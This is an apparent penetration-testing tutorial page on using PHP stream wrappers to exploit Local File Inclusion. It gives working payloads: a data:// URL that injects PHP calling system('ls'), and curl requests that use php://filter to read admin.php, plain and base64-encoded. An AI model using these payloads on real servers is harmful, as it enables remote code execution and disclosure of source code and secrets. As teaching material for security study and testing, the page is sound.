PHP Wrappers

PHP wrappers are additional code that tells the stream how to handle specific protocols/encodings. There are about 12 different php wrappers and additional custom wrappers can also be introduced. You can read about these wrappers from here.

PHP wrappers can greatly help to exploit Local File Inclusion(LFI) vulernability in cases where the server has checks to prevent LFI.

The following is an example of including code into a file reading step within a php page,

http://192.168.1.1/pricelist.php?file=data://text/plain,<?php%20echo%20system('ls');?>"

The following is an example of wrapper to display the contents of a file with or without encoding,

curl http://192.168.1.1/pricelist.php/index.php?page=php://filter/resource=admin.php
curl http://192.168.1.1/pricelist.php/index.php?page=php://filter/convert.base64-encode/resource=admin.php

Now, in this manner code can be introduced to either read a local file or to access a file from a remote server through HTTP.

PreviousRemote File Inclusion NextSQL Injection

Last updated 5 months ago

Was this helpful?